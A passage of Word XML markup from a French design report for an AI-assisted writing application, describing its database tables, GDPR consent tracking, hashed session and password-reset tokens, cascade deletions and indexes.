              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">VARCHAR(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NOT NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">reformuler</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">corriger</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">completer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">content_before</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Texte soumis au modèle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">content_after</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Proposition retournée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">tokens_used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">INT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">défaut 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Métrique d'usage pour le back-office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Horodatage, base du comptage de quota</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Auteur de l'appel (RG4, RG8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">id_document</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document</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, NOT NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Document concerné (RG4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">consentement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— traçabilité RGPD</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id_consentement</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type_consentement</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Nature du consentement (CGU,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">traitement_ia_local</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">accepte</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Réponse donnée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">date_consentement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et heure du recueil</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Personne concernée (RG5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le RGPD impose de pouvoir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">prouver</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">le consentement. Une simple case cochée dans un formulaire ne se prouve pas : c'est la raison d'être de cette table, qui conserve le type, la réponse et l'horodatage de chaque recueil.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">user_session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— sessions et refresh tokens</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id_session</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refresh_token_hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">VARCHAR(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NOT NULL,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">U</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Empreinte SHA-256</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">du jeton, jamais le jeton</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">refresh_token_exp</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Expiration (7 jours)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">revoke</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Drapeau de révocation</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Ouverture de session</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Titulaire (RG6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C'est cette table qui rend la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">révocation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>possible : sans état serveur, un JWT reste valide jusqu'à son expiration, quoi qu'il arrive. La rotation décrite en § 4 s'appuie sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">revoke</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, et le stockage sous forme d'empreinte aligne cette table sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">password_reset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: une fuite de la base ne livrerait aucun jeton rejouable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">password_reset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— demandes de réinitialisation</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token_hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">VARCHAR(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NOT NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Empreinte SHA-256</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">du jeton, jamais le jeton</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">expires_at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Expiration à 1 h</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">used</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Usage unique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de la demande</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Demandeur (RG7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le jeton envoyé par courriel n'est jamais stocké : seule son empreinte l'est. Une fuite de la base ne permettrait donc pas de réinitialiser des mots de passe, exactement comme pour</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mdp_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="63"/>
    <w:bookmarkStart w:id="64" w:name="Xd65021454f895d0653fd7a375330412b0e25e16"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Intégrité référentielle et suppressions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deux comportements de suppression coexistent, et ils répondent à deux intentions différentes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Suppression en cascade depuis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Supprimer un compte supprime ses dossiers, ses documents, ses interactions IA, ses consentements, ses sessions et ses demandes de réinitialisation. C'est la traduction technique du droit à l'effacement du RGPD : aucune donnée orpheline ne doit survivre au compte. La cascade est déclarée</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">deux fois</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, et ce n'est pas une redondance inutile :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cascade="all, delete-orphan"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">côté SQLAlchemy pour les suppressions faites par l'application, et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ondelete="CASCADE"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sur la clé étrangère pour que le SGBD l'applique même à une suppression effectuée hors de l'application — script d'administration, requête directe. Sans la seconde, le droit à l'effacement ne serait garanti que par le code applicatif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mise à nul depuis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dossier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Supprimer un dossier ne supprime pas les documents qu'il contenait : leur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id_dossier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">repasse à NULL et ils réapparaissent dans « Tous les documents ». Supprimer un classeur ne doit pas détruire son contenu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce second comportement a nécessité une précaution propre à SQLite, l'environnement de développement :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQLite n'applique pas les contraintes de clé étrangère par défaut</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, contrairement à InnoDB. Sans activation explicite, le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ON DELETE SET NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">déclaré sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.id_dossier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ne serait jamais exécuté, et supprimer un dossier laisserait des documents pointant vers une ligne inexistante — une corruption silencieuse, invisible tant qu'on ne relit pas ces documents. Un écouteur d'événement de connexion émet donc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PRAGMA foreign_keys=ON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">à chaque ouverture :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3417331" cy="588919"/>
            <wp:docPr id="27" name="Picture 27"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="795b9092560e-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3417331" cy="588919"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce point illustre une limite qu'il faut connaître :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">deux SGBD ne se comportent pas identiquement à schéma égal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La cible MySQL n'a pas besoin de ce correctif, mais le code doit fonctionner dans les deux environnements.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="64"/>
    <w:bookmarkStart w:id="65" w:name="X6fbb7a128b6dd3d761e66a39e83e5d08d0190f8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Index</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Au-delà des index implicites des clés primaires et des contraintes d'unicité, quatre index sont ajoutés, chacun rattaché à une requête réelle de l'application :</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Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Requête servie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fréquence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ia (user_id, created_at)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Comptage des appels d'un utilisateur sur 24 h — vérification du quota</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">À chaque demande de génération</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ia (id_document, created_at)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Historique IA d'un document, du plus récent au plus ancien</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">À chaque ouverture de l'éditeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">document (user_id, updated_at)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Liste paginée des documents, triée par date de modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">À chaque affichage de la liste et du tableau de bord</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">document (id_dossier)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Filtrage par dossier, et mise à nul en cascade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Filtrage, suppression de dossier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'index sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia (user_id, created_at)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est le plus structurant : il porte le contrôle exécuté avant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">chaque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">appel au modèle. Sans lui, la vérification du quota deviendrait un parcours complet du journal des interactions, dont la table est celle qui croît le plus vite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'index sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document (user_id, updated_at)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prend une importance particulière du fait de l'enregistrement automatique : chaque session de rédaction produit plusieurs écritures sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, et la liste triée par date de modification est l'écran le plus consulté.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="65"/>
    <w:bookmarkStart w:id="67" w:name="X654719561c2a16ce98be407cfb3f65895e59c67"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
